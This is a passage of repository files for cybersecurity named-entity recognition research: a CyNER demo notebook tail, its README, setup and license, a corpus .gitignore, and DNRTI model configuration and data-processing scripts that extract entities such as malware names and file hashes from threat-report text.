+ "output_type": "stream",
67
+ "text": [
68
+ "2022-02-15 11:48:17 INFO *** initialize network ***\n"
69
+ ]
70
+ },
71
+ {
72
+ "name": "stdout",
73
+ "output_type": "stream",
74
+ "text": [
75
+ "Mention: Proofpoint, Class: Organization, Start: 0, End: 10, Confidence: 0.82\n",
76
+ "Mention: FluBot, Class: Malware, Start: 156, End: 162, Confidence: 0.92\n",
77
+ "Mention: 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80, Class: Indicator, Start: 163, End: 227, Confidence: 0.90\n",
78
+ "Mention: Android, Class: System, Start: 231, End: 238, Confidence: 1.00\n"
79
+ ]
80
+ }
81
+ ],
82
+ "source": [
83
+ "entities = model1.get_entities(text)\n",
84
+ "\n",
85
+ "for e in entities:\n",
86
+ " print(e)"
87
+ ]
88
+ },
89
+ {
90
+ "cell_type": "code",
91
+ "execution_count": 5,
92
+ "id": "79fcee8b",
93
+ "metadata": {},
94
+ "outputs": [],
95
+ "source": [
96
+ "del model1"
97
+ ]
98
+ },
99
+ {
100
+ "cell_type": "markdown",
101
+ "id": "b3edc170",
102
+ "metadata": {},
103
+ "source": [
104
+ "#### Model2: Using pretrained transformers and heuristics"
105
+ ]
106
+ },
107
+ {
108
+ "cell_type": "code",
109
+ "execution_count": 6,
110
+ "id": "a94605d5",
111
+ "metadata": {},
112
+ "outputs": [],
113
+ "source": [
114
+ "model2 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=True, flair_model=None, priority='HTFS')"
115
+ ]
116
+ },
117
+ {
118
+ "cell_type": "code",
119
+ "execution_count": 7,
120
+ "id": "856d5fa4",
121
+ "metadata": {},
122
+ "outputs": [
123
+ {
124
+ "name": "stderr",
125
+ "output_type": "stream",
126
+ "text": [
127
+ "2022-02-15 11:48:25 INFO *** initialize network ***\n"
128
+ ]
129
+ },
130
+ {
131
+ "name": "stdout",
132
+ "output_type": "stream",
133
+ "text": [
134
+ "Mention: 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80, Class: SHA256, Start: 163, End: 227, Confidence: 1.00\n",
135
+ "Mention: Proofpoint, Class: Organization, Start: 0, End: 10, Confidence: 0.82\n",
136
+ "Mention: FluBot, Class: Malware, Start: 156, End: 162, Confidence: 0.92\n",
137
+ "Mention: Android, Class: System, Start: 231, End: 238, Confidence: 1.00\n"
138
+ ]
139
+ }
140
+ ],
141
+ "source": [
142
+ "entities = model2.get_entities(text)\n",
143
+ "\n",
144
+ "for e in entities:\n",
145
+ " print(e)"
146
+ ]
147
+ },
148
+ {
149
+ "cell_type": "code",
150
+ "execution_count": 8,
151
+ "id": "1418492c",
152
+ "metadata": {},
153
+ "outputs": [],
154
+ "source": [
155
+ "del model2"
156
+ ]
157
+ },
158
+ {
159
+ "cell_type": "markdown",
160
+ "id": "dce0f612",
161
+ "metadata": {},
162
+ "source": [
163
+ "#### Model3: Using pretrained transformers with heuristics and Flair"
164
+ ]
165
+ },
166
+ {
167
+ "cell_type": "code",
168
+ "execution_count": null,
169
+ "id": "0c393f57",
170
+ "metadata": {},
171
+ "outputs": [],
172
+ "source": [
173
+ "model3 = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=True, flair_model='ner')"
174
+ ]
175
+ },
176
+ {
177
+ "cell_type": "code",
178
+ "execution_count": null,
179
+ "id": "097ab089",
180
+ "metadata": {},
181
+ "outputs": [],
182
+ "source": [
183
+ "entities = model3.get_entities(text)\n",
184
+ "\n",
185
+ "for e in entities:\n",
186
+ " print(e)"
187
+ ]
188
+ },
189
+ {
190
+ "cell_type": "code",
191
+ "execution_count": null,
192
+ "id": "c7f90626",
193
+ "metadata": {},
194
+ "outputs": [],
195
+ "source": [
196
+ "del model3"
197
+ ]
198
+ },
199
+ {
200
+ "cell_type": "markdown",
201
+ "id": "95beae09",
202
+ "metadata": {},
203
+ "source": [
204
+ "#### Train(finetune) transformer on user provided data"
205
+ ]
206
+ },
207
+ {
208
+ "cell_type": "code",
209
+ "execution_count": null,
210
+ "id": "ef41568a",
211
+ "metadata": {},
212
+ "outputs": [],
213
+ "source": [
214
+ "cfg = {'checkpoint_dir': '.ckpt',\n",
215
+ " 'dataset': 'dataset/mitre',\n",
216
+ " 'transformers_model': 'xlm-roberta-large',\n",
217
+ " 'lr': 5e-6,\n",
218
+ " 'epochs': 20,\n",
219
+ " 'max_seq_length': 128}\n",
220
+ "model = cyner.TransformersNER(cfg)\n",
221
+ "model.train()"
222
+ ]
223
+ },
224
+ {
225
+ "cell_type": "code",
226
+ "execution_count": null,
227
+ "id": "b664b9dd",
228
+ "metadata": {},
229
+ "outputs": [],
230
+ "source": []
231
+ }
232
+ ],
233
+ "metadata": {
234
+ "kernelspec": {
235
+ "display_name": "Python 3 (ipykernel)",
236
+ "language": "python",
237
+ "name": "python3"
238
+ },
239
+ "language_info": {
240
+ "codemirror_mode": {
241
+ "name": "ipython",
242
+ "version": 3
243
+ },
244
+ "file_extension": ".py",
245
+ "mimetype": "text/x-python",
246
+ "name": "python",
247
+ "nbconvert_exporter": "python",
248
+ "pygments_lexer": "ipython3",
249
+ "version": "3.8.10"
250
+ }
251
+ },
252
+ "nbformat": 4,
253
+ "nbformat_minor": 5
254
+ }
data/raw/CyNER/LICENSE.txt ADDED
@@ -0,0 +1,21 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ MIT License
2
+
3
+ Copyright (c) 2022 aiforsec
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
data/raw/CyNER/README.md ADDED
@@ -0,0 +1,41 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # CyNER: Python Library for Cybersecurity Named Entity Recognition
2
+
3
+ CyNER is a python library for extracting cybersecurity named entities. We combine different models with a priority based merging for extarcting cybersecurity entities: transformer models trained on cybersecurity corpus for cybersecurity-specific entities, regular expression matching for identifying indicators, and NER models from Flair and SpaCy for generic entity types.
4
+
5
+ ### Getting Started
6
+ `pip install git+https://github.com/aiforsec/CyNER.git`
7
+
8
+
9
+ ### Prediction
10
+ To get prediction with pretrained NER model
11
+
12
+ ```
13
+ import cyner
14
+
15
+ model = cyner.CyNER(transformer_model='xlm-roberta-large', use_heuristic=False, flair_model=None)
16
+
17
+ text = 'Proofpoint report mentions that the German-language messages were turned off once the UK messages were established, indicating a conscious effort to spread FluBot 446833e3f8b04d4c3c2d2288e456328266524e396adbfeba3769d00727481e80 in Android phones.'
18
+
19
+ entities = model.get_entities(text)
20
+
21
+ for e in entities:
22
+ print(e)
23
+ ```
24
+
25
+ Please check `CyNER Demo` notebook for more details.
26
+
27
+
28
+ ## Training
29
+ To finetune model on user provided dataset
30
+
31
+ ```
32
+ cfg = {'checkpoint_dir': '.ckpt',
33
+ 'dataset': 'dataset/mitre',
34
+ 'transformers_model': 'xlm-roberta-large',
35
+ 'lr': 5e-6,
36
+ 'epochs': 20,
37
+ 'max_seq_length': 128}
38
+ model = cyner.TransformersNER(cfg)
39
+ model.train()
40
+ ```
41
+
data/raw/CyNER/requirements.txt ADDED
@@ -0,0 +1,19 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ flair
2
+ spacy
3
+ ipywidgets
4
+ spacy-transformers
5
+ Pillow>=7.1.0'
6
+ sudachipy
7
+ sudachidict_core
8
+ uvicorn==0.11.8
9
+ jinja2==2.11.3
10
+ aiofiles==0.5.0
11
+ fastapi==0.65.2
12
+ matplotlib==3.3.1
13
+ toml
14
+ tensorboard
15
+ torch
16
+ transformers
17
+ sentencepiece
18
+ seqeval
19
+ segtok
data/raw/CyNER/setup.cfg ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ [metadata]
2
+ description-file = README.md
data/raw/CyNER/setup.py ADDED
@@ -0,0 +1,51 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from setuptools import setup, find_packages
2
+
3
+ with open('README.md', 'r') as f:
4
+ readme = f.read()
5
+ version = '0.0.1'
6
+ setup(
7
+ name='cyner',
8
+ packages=find_packages(exclude=["tests", "models"]),
9
+ version=version,
10
+ license='MIT',
11
+ description='Cybersecurity named entity recognition',
12
+ url='https://github.com/aiforsec/CyNER',
13
+ download_url="https://github.com/aiforsec/CyNER/archive/{}.tar.gz".format(version),
14
+ keywords=['ner', 'nlp', 'language-model'],
15
+ long_description=readme,
16
+ long_description_content_type="text/markdown",
17
+ author='Tanvirul Alam',
18
+ author_email='tanvirul.alam@mail.rit.edu',
19
+ classifiers=[
20
+ 'Development Status :: 4 - Beta', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
21
+ 'Intended Audience :: Developers', # Define that your audience are developers
22
+ 'Intended Audience :: Science/Research',
23
+ 'Topic :: Scientific/Engineering',
24
+ 'License :: OSI Approved :: MIT License', # Again, pick a license
25
+ 'Programming Language :: Python :: 3', #Specify which pyhton versions that you want to support
26
+ ],
27
+ include_package_data=True,
28
+ # test_suite='tests',
29
+ install_requires=[
30
+ 'flair',
31
+ 'spacy',
32
+ 'ipywidgets',
33
+ 'spacy-transformers',
34
+ 'Pillow>=7.1.0',
35
+ 'sudachipy',
36
+ 'sudachidict_core',
37
+ 'uvicorn==0.11.8',
38
+ 'jinja2==2.11.3',
39
+ 'aiofiles==0.5.0',
40
+ 'fastapi==0.65.2',
41
+ 'matplotlib==3.3.1',
42
+ 'toml',
43
+ 'tensorboard',
44
+ 'torch',
45
+ 'transformers',
46
+ 'sentencepiece',
47
+ 'seqeval',
48
+ 'segtok'
49
+ ],
50
+ python_requires='>=3.6',
51
+ )
data/raw/CyberNER_harmonized/.gitignore ADDED
@@ -0,0 +1,63 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Ignorer les dossiers de données et sorties volumineuses
2
+ datasets/
3
+ logs/
4
+ logs_cyberner/
5
+ output_dups/
6
+ outputs/
7
+ outputs_cyberner/
8
+ outputs_cyberner_coverage/
9
+ outputs_cyberner_dedup_coverage/
10
+
11
+ # Ignorer les fichiers spécifiques
12
+ dataset/final_ner.csv
13
+ notebooks/version.ipynb
14
+
15
+ # Ignorer les chemins absolus spécifiques
16
+ /home/yasir.ech-chammakhy/lustre/cyber_cc-lcbfvhtc9qm/users/yasir.ech-chammakhy/CyberNER/dataset/final_ner.csv
17
+ /home/yasir.ech-chammakhy/lustre/cyber_cc-lcbfvhtc9qm/users/yasir.ech-chammakhy/CyberNER/notebooks/version.ipynb
18
+
19
+ # Ignorer les fichiers temporaires
20
+ *.tmp
21
+ *.temp
22
+ *.log
23
+ *.bak
24
+
25
+ # Ignorer les environnements virtuels
26
+ venv/
27
+ *-venv/
28
+ __pycache__/
29
+ *.pyc
30
+ *.pyo
31
+
32
+ # Ignorer les fichiers spécifiques à l'environnement
33
+ .DS_Store
34
+ .env
35
+ .idea/
36
+ .vscode/
37
+
38
+ # Ignorer les fichiers volumineux
39
+ *.zip
40
+ *.tar.gz
41
+ *.model
42
+ *.bin
43
+ *.h5
44
+ *.pkl
45
+ *.npy
46
+
47
+ # Ignorer les checkpoints et modèles
48
+ checkpoints/
49
+ models/
50
+ *.pt
51
+ *.ckpt
52
+
53
+ # Ignorer les fichiers de données volumineuses
54
+ *.csv
55
+ *.json
56
+ *.jsonl
57
+ *.txt
58
+ !README.txt
59
+ !requirements.txt
60
+
61
+ # Exceptions pour les fichiers importants
62
+ !scripts/*.py
63
+ !scripts/*.sh
data/raw/CyberNER_harmonized/README.md ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # CyberNER: A Harmonized STIX Corpus for Cybersecurity Named Entity Recognition
2
+
3
+ **Description:**
4
+
5
+ This repository contains the CyberNER project, focused on addressing schema heterogeneity in cybersecurity Named Entity Recognition (NER). We introduce **CyberNER**, a large-scale, unified corpus created by systematically harmonizing four prominent datasets (CyNER, DNRTI, APTNER, and Attacker) onto a consistent taxonomy based on the STIX 2.1 standard.
6
+
7
+ The primary goal of CyberNER is to overcome the challenges posed by incompatible annotation schemas in existing resources. By providing a standardized, STIX-aligned benchmark dataset, this project aims to facilitate the development, rigorous evaluation, and comparison of more robust, generalizable, and interoperable NER models for the cybersecurity domain.
8
+
9
+ This repository includes:
10
+ * The harmonized CyberNER dataset.
11
+ * Scripts used for data cleaning and schema harmonization.
12
+ * Code for training and evaluating benchmark NER models (e.g., BERT-CRF variants) on the CyberNER corpus.
data/raw/DNRTI/README.md ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ This repository is implemented corresponding to the paper http://arxiv.org/abs/2207.00232
2
+
3
+ You should have installed gensim==3.8, transformers, tqdm in your compile environment.
4
+ When running the program, you should have the data_processsing.py first, then get the POS_Embedding.py and wod2vec_embedding.py(sorry, I have the wrong name for it) in BiLSTM_CNN, next you should apply the Bert_retrain in Finetuning_BertCRF. At the last, you can the train the main.py.
data/raw/DNRTI/arguments.py ADDED
@@ -0,0 +1,152 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/8/16 下午3:43
4
+ # @Author : PeiP Liu
5
+ # @FileName: arguments.py
6
+ # @Software: PyCharm
7
+ import os
8
+ import torch
9
+ import pickle
10
+ import numpy as np
11
+
12
+ # import sys
13
+ # sys.path.append(".")
14
+
15
+ # os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'
16
+ os.environ['CUDA_VISIBLE_DEVICES'] = '1'
17
+ ab_path = '/bigdata/liupeipei/Multi_features_based_semantic_augmentation_networks_for_NER_in_TI'
18
+
19
+
20
+ def read_pickle(file_add):
21
+ with open(file_add, 'rb') as file:
22
+ data = pickle.load(file)
23
+ return data
24
+
25
+
26
+ def read_numpy(file_addr):
27
+ np_data = np.load(file_addr)
28
+ return np_data
29
+
30
+
31
+ class BasicArgs:
32
+ batch_size = 64
33
+ max_seq_len = 256
34
+ learning_rate = 5e-3
35
+ # choose the device, if GPU is available, we can use it. otherwise, the cpu is a replacement
36
+ device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
37
+ total_train_epoch = 400
38
+
39
+ orig_dataset = read_pickle(ab_path + '/Result/Data/MalwareDB/orig_dict.pickle')
40
+ num_train = orig_dataset['num_train']
41
+ num_valid = orig_dataset['num_valid']
42
+ num_test = orig_dataset['num_test']
43
+
44
+ dict_dataset = read_pickle(ab_path + '/Result/Data/MalwareDB/index_dict.pickle')
45
+ label2idx = dict_dataset['label2index'] # for BERT loss
46
+ idx2label = dict_dataset['index2label'] # for prediction
47
+ word2idx = dict_dataset['word2index']
48
+ idx2word = dict_dataset['index2word']
49
+ pos2idx = dict_dataset['pos2index'] # for pos_emb training
50
+ idx2pos = dict_dataset['index2pos']
51
+ case2idx = dict_dataset['case2idx']
52
+
53
+ num_labels = len(label2idx)
54
+
55
+
56
+ class BertArgs(BasicArgs):
57
+ output_dir = ab_path + '/Result/BERT_model/MalwareDB/'
58
+
59
+ train_seq_list = BasicArgs.orig_dataset['train_sentences'] # for BERT train, list type
60
+ train_seq_label_list = BasicArgs.orig_dataset['train_labels'] # for BERT train, list type
61
+ valid_seq_list = BasicArgs.orig_dataset['valid_sentences'] # for BERT valid, list type
62
+ valid_seq_label_list = BasicArgs.orig_dataset['valid_labels'] # for BERT valid, list type
63
+ test_seq_list = BasicArgs.orig_dataset['test_sentences'] # for BERT test, list type
64
+ test_seq_label_list = BasicArgs.orig_dataset['test_labels'] # for BERT test, list type
65
+
66
+ model_list = ['bert-base-uncased', 'bert-large-uncased', 'bert-base-cased']
67
+ model_id = 2
68
+
69
+ # if you retrain the model, please make load_checkpoint = True
70
+ load_checkpoint = False
71
+ weight_decay_finetune = 1e-5
72
+ lr_crf_fc = 1e-5
73
+ weight_decay_crf_fc = 1e-5
74
+ warmup_proportion = 0.002
75
+
76
+ # the larger batch_size is, the effect will be better. However, some labs's GPU is not available enough.
77
+ # So we can accumulate X*gradient (gradient in each batch) to achieve the same effect as batch_size*X.
78
+ # that is, we don't empty the gradient each batch until X batches
79
+ # rf https://blog.csdn.net/Princeicon/article/details/108058822
80
+ gradient_accumulation_steps = 4
81
+
82
+
83
+ class BilstmCnnArgs(BasicArgs):
84
+ output_dir = ab_path + '/Result/LSTM_model/MalwareDB/'
85
+
86
+ # all_sentences = BasicArgs.orig_dataset['all_sentences'] # for word2vec training
87
+
88
+ real_sent_maxlen = BasicArgs.orig_dataset['sent_maxlen'] # list type
89
+ real_word_maxlen = BasicArgs.orig_dataset['word_maxlen'] # list type
90
+ # real_sent_maxlen = 128
91
+ # real_word_maxlen = 100
92
+
93
+ train_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/train_id_pad_dict.pickle') # used for bilstm train
94
+ train_wordids_pad = train_id_pad['train_wordids_pad']
95
+ train_charids_pad = train_id_pad['train_charids_pad']
96
+ train_labelids_pad = train_id_pad['train_labelids_pad']
97
+ train_posids_pad = train_id_pad['train_posids_pad']
98
+ train_caseids_pad = train_id_pad['train_caseids_pad']
99
+
100
+ valid_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/valid_id_pad_dict.pickle') # used for bilstm validation
101
+ valid_wordids_pad = valid_id_pad['valid_wordids_pad']
102
+ valid_charids_pad = valid_id_pad['valid_charids_pad']
103
+ valid_labelids_pad = valid_id_pad['valid_labelids_pad']
104
+ valid_posids_pad = valid_id_pad['valid_posids_pad']
105
+ valid_caseids_pad = valid_id_pad['valid_caseids_pad']
106
+
107
+ test_id_pad = read_pickle(ab_path + '/Result/Data/MalwareDB/test_id_pad_dict.pickle') # used for bilstm test
108
+ test_wordids_pad = test_id_pad['test_wordids_pad']
109
+ test_charids_pad = test_id_pad['test_charids_pad']
110
+ test_labelids_pad = test_id_pad['test_labelids_pad']
111
+ test_posids_pad = test_id_pad['test_posids_pad']
112
+ test_caseids_pad = test_id_pad['test_caseids_pad']
113
+
114
+ # all_posids_pad = train_posids_pad + valid_posids_pad + test_posids_pad # used for pos_emb training
115
+
116
+ word_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/word_embedding.npy') # numpy.array
117
+ char_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/char_embedding.npy')
118
+ pos_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/pos_embedding.npy')
119
+ case_emb_table = read_numpy(ab_path + '/Result/Embedding/MalwareDB/case_embedding.npy')
120
+
121
+ char_embed_dim = 30
122
+ word_embed_dim = 50
123
+ pos_embed_dim = 10
124
+ case_embed_dim = 8
125
+ input_dim = 98 # char_emb_dim + word_emb_dim + pos_emb_dim + case_emb_dim
126
+ hid_dim = 256
127
+ model_dim = 128
128
+
129
+ transformer_num_blocks = 4
130
+ transformer_num_heads = 8
131
+
132
+ index2word = read_pickle(ab_path + '/Result/Data/MalwareDB/index_dict.pickle')['index2word']
133
+ word2vec = read_numpy(ab_path + '/Result/Embedding/MalwareDB/word2vec_embedding.npy')
134
+ sim_num = 4
135
+
136
+ bilstm_layers = 4
137
+
138
+ dropout_rate = 0.5
139
+ attention_type = 'general'
140
+
141
+ min_delta = 0.0001
142
+ patience = 12
143
+
144
+ lr = 5e-4
145
+ weight_decay = 0.001
146
+ min_lr = 5e-5
147
+ lr_decay_factor = 0.5
148
+
149
+ word_pad_indx = 0
150
+ label_bos_indx = 0
151
+ label_eos_indx = 1
152
+ label_pad_indx = 2
data/raw/DNRTI/construct_input.py ADDED
@@ -0,0 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ from torch.utils.data import DataLoader
2
+ from torch.nn.utils.rnn import pad_sequence
3
+ import pandas as pd
4
+ import torch
5
+
6
+
7
+ # this function input the list of ele,
8
+ # and ele include a sample of three tensors
9
+ # [token_tensor, segmentation_tensor, label_tensor]
10
+ def create_format_input(input):
11
+ tokens_tensors = [ele[0] for ele in input]
12
+ segmentation_tensors = [ele[1] for ele in input]
13
+
14
+ if input[0][2] is not None:
15
+ label_ids = torch.stack([ele[2] for ele in input])
16
+ else:
17
+ label_ids = None
18
+
19
+ tokens_tensors = pad_sequence(tokens_tensors, batch_first= True, padding_value = 0)
20
+ # pad_sequence: the default length is max_len in this batch
21
+ segmentation_tensors = pad_sequence(segmentation_tensors, batch_first= True, padding_value = 0)
22
+
23
+ masked_tensors = torch.zeros(tokens_tensors.shape, dtype = torch.long)
24
+ masked_tensors = masked_tensors.masked_fill(tokens_tensors != 0,1)
25
+
26
+ return tokens_tensors, segmentation_tensors, masked_tensors, label_ids
27
+
28
+
29
+ def create_batch_data(traindata):
30
+ batch_size = 64
31
+ trainloader = DataLoader(traindata, batch_size= batch_size, collate_fn=create_format_input)
32
+ yield trainloader
33
+
34
+
35
+ def create_test_batch_data():
36
+ # construct the dataset for prediction
37
+ test_dataset = CreateDataset('test', tokenizer=tokenizer)
38
+ test_dataloader = DataLoader(test_dataset, batch_size=256, collate_fn=create_format_input)
39
+ predictions = get_predictions(model, test_dataloader)
40
+ index_map = {v : k for k, v in test_dataset.label_map.items()}
41
+
42
+ df = pd.Dataframe({'Category': predictions.to_list()})
43
+ df['Category'] = df['Category'].apply(lambda x: index_map(x))
44
+
45
+
data/raw/DNRTI/data_processing.py ADDED
@@ -0,0 +1,193 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/python3
2
+ # -*- coding: utf-8 -*-
3
+ # @Time : 2021/9/1 上午10:52
4
+ # @Author : PeiP Liu
5
+ # @FileName: data_processing.py
6
+ # @Software: PyCharm
7
+
8
+ import torch
9
+ import torch.nn as nn
10
+ import pickle
11
+ import numpy as np
12
+ from data_utils import *
13
+
14
+ # get the text data from orig_file
15
+ train_dataset = processing_orgdata('train')
16
+ valid_dataset = processing_orgdata('valid')
17
+ test_dataset = processing_orgdata('test')
18
+
19
+ # all_str_sentences = train_dataset[3] + valid_dataset[3] + test_dataset[3]
20
+ # all_str_sentences = train_dataset[3] + valid_dataset[3] + test_dataset[3]
21
+ # with open('Result/Data/sentences_text', 'a+') as file:
22
+ # for sent in all_str_sentences:
23
+ # file.write(sent+'\n')
24
+ # file.close()
25
+
26
+ # get the max length of sentence(word) and word(char)
27
+ sent_maxlen = max(train_dataset[4], valid_dataset[4], test_dataset[4]) # 这里的最长后续要根据数据的分布情况调整
28
+ word_maxlen = max(train_dataset[5], valid_dataset[5], test_dataset[5]) # 这里的最长后续要根据数据的分布情况调整
29
+
30
+ # construct the dict of
31
+ build_vocab_sentences = train_dataset[0] + valid_dataset[0] + test_dataset[0]
32
+ build_vocab_sentences_labels = train_dataset[1] + valid_dataset[1] + test_dataset[1]
33
+ build_vocab_sentences_pos = train_dataset[2] + valid_dataset[2] + test_dataset[2]
34
+
35
+ # create the dict for storing dataset
36
+ orig_dict = dict(all_sentences=build_vocab_sentences,
37
+ all_sentences_labels=build_vocab_sentences_labels,
38
+ all_sentences_pos=build_vocab_sentences_pos,
39
+ train_sentences=train_dataset[0],
40
+ valid_sentences=valid_dataset[0],
41
+ test_sentences=test_dataset[0],
42
+ train_labels=train_dataset[1],
43
+ valid_labels=valid_dataset[1],
44
+ test_labels=test_dataset[1],
45
+ train_pos=train_dataset[2],
46
+ valid_pos=valid_dataset[2],
47
+ test_pos=test_dataset[2],
48
+ sent_maxlen=sent_maxlen,
49
+ word_maxlen=word_maxlen,
50
+ num_train=train_dataset[-1],
51
+ num_valid=valid_dataset[-1],
52
+ num_test=test_dataset[-1]
53
+ )
54
+
55
+ with open('Result/Data/MalwareDB/orig_dict.pickle', 'wb') as file:
56
+ pickle.dump(orig_dict, file) # can be used for bert
57
+
58
+ # the dict result,后续我们需要增强字符字典的内容
59
+ build_vocab_result = build_vocab(build_vocab_sentences, build_vocab_sentences_labels, build_vocab_sentences_pos)
60
+ case2idx, case_emb = case_feature()
61
+
62
+ # create the index dict
63
+ index_dict = dict(word2index=build_vocab_result[0],
64
+ index2word=build_vocab_result[1],
65
+ char2index=build_vocab_result[2],
66
+ index2char=build_vocab_result[3],
67
+ label2index=build_vocab_result[4],
68
+ index2label=build_vocab_result[5],
69
+ pos2index=build_vocab_result[6],
70
+ index2pos=build_vocab_result[7],
71
+ case2idx=case2idx
72
+ )
73
+
74
+ with open('Result/Data/MalwareDB/index_dict.pickle', 'wb') as file:
75
+ pickle.dump(index_dict, file) # can be used for others
76
+
77
+ # convert the orig_train_text to id
78
+ train_text2ids = text2ids(train_dataset[0], train_dataset[1],
79
+ train_dataset[2], build_vocab_result[0],build_vocab_result[2],
80
+ build_vocab_result[4], build_vocab_result[6], case2idx)
81
+
82
+ train_id_dict = dict(train_sents_wordids=train_text2ids[0],
83
+ train_sents_charids=train_text2ids[1],
84
+ train_sents_labelids=train_text2ids[2],
85
+ train_sents_posids=train_text2ids[3],
86
+ train_sents_caseids=train_text2ids[4]
87
+ )
88
+
89
+ with open('Result/Data/MalwareDB/train_id_dict.pickle', 'wb') as file:
90
+ pickle.dump(train_id_dict, file) # can be used for others
91
+
92
+ # convert the orig_valid_text to id
93
+ valid_text2ids = text2ids(valid_dataset[0], valid_dataset[1],
94
+ valid_dataset[2], build_vocab_result[0], build_vocab_result[2],
95
+ build_vocab_result[4], build_vocab_result[6], case2idx)
96
+
97
+ valid_id_dict = dict(valid_sents_wordids=valid_text2ids[0],
98
+ valid_sents_charids=valid_text2ids[1],
99
+ valid_sents_labelids=valid_text2ids[2],
100
+ valid_sents_posids=valid_text2ids[3],
101
+ valid_sents_caseids=valid_text2ids[4]
102
+ )
103
+
104
+ with open('Result/Data/MalwareDB/valid_id_dict.pickle', 'wb') as file:
105
+ pickle.dump(valid_id_dict, file) # can be used for others
106
+
107
+ # convert the orig_test_text to id
108
+ test_text2ids = text2ids(test_dataset[0], test_dataset[1],
109
+ test_dataset[2], build_vocab_result[0], build_vocab_result[2],
110
+ build_vocab_result[4], build_vocab_result[6], case2idx)
111
+
112
+ test_id_dict = dict(valid_sents_wordids=test_text2ids[0],
113
+ valid_sents_charids=test_text2ids[1],
114
+ valid_sents_labelids=test_text2ids[2],
115
+ valid_sents_posids=test_text2ids[3],
116
+ valid_sents_caseids=test_text2ids[4]
117
+ )
118
+
119
+ with open('Result/Data/MalwareDB/test_id_dict.pickle', 'wb') as file:
120
+ pickle.dump(test_id_dict, file) # can be used for others
121
+
122
+ # pad the_word_id, label_id, pos_id, and case_id of train_sentence
123
+ train_word_sentence_padding = sentence_padding(train_text2ids[0], sent_maxlen, build_vocab_result[0]['[PAD]'])
124
+ # train_word_sentence_padding = torch.tensor(train_word_sentence_padding, dtype=torch.long)
125
+ train_label_sentence_padding = sentence_padding(train_text2ids[2], sent_maxlen, build_vocab_result[4]['[X]'])
126
+ train_pos_sentence_padding = sentence_padding(train_text2ids[3], sent_maxlen, build_vocab_result[6]['[PPAD]'])
127
